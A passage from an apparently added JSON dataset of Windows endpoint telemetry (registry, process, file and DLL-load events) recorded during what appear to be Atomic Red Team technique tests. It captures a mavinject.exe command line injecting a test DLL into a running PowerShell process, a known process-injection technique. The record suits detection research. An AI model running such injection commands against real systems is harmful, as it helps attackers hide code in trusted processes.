"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "registry", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "registry", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "registry", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "registry", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "registry", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "registry", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573503080000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "process", + "pid": 976, + "process_name": "Temptcm.tmp", + "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "subtype": "terminate", + "timestamp": 131883573503230000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" + }, + { + "event_type": "file", + "file_name": "TEMPTCM.TMP-3991A72E.pf", + "file_path": "C:\\Windows\\Prefetch\\TEMPTCM.TMP-3991A72E.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573503230000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "process", + "pid": 5572, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573503230000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010ECBB5501}" + }, + { + "event_type": "process", + "pid": 1852, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573503390000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010F6BA5501}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7708, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573503510000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001046C45501}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7708, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573503390000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001046C45501}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7708, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573503390000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001046C45501}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7708, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573503390000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001046C45501}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7708, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573503390000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001046C45501}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7708, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573503540000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001046C45501}" + }, + { + "event_type": "process", + "pid": 7708, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573503540000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001046C45501}" + }, + { + "event_type": "registry", + "pid": 7036, + "process_name": "powershell.exe", + "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573504480000, + "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" + }, + { + "event_type": "registry", + "pid": 7036, + "process_name": "powershell.exe", + "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573504480000, + "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573504640000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573504640000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573504640000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573504640000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573504640000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573549480000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573549480000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573549480000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "file", + "file_name": "SVCHOST.EXE-7F44DDFD.pf", + "file_path": "C:\\Windows\\Prefetch\\SVCHOST.EXE-7F44DDFD.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573557450016, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\mavinject.exe\" 7036 /INJECTRUNNING C:\\AtomicRedTeam\\atomics\\T1055\\src\\x64\\T1055.dll", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7792, + "ppid": 7036, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "subtype": "create", + "timestamp": 131883573570600000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "mavinject.exe", + "image_path": "C:\\Windows\\System32\\mavinject.exe", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "shell32.dll", + "image_path": "C:\\Windows\\System32\\shell32.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570740000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "windows.storage.dll", + "image_path": "C:\\Windows\\System32\\windows.storage.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570890000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570890000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570890000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570890000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570890000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 7792, + "process_name": "mavinject.exe", + "process_path": "C:\\Windows\\System32\\mavinject.exe", + "timestamp": 131883573570890000, + "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": 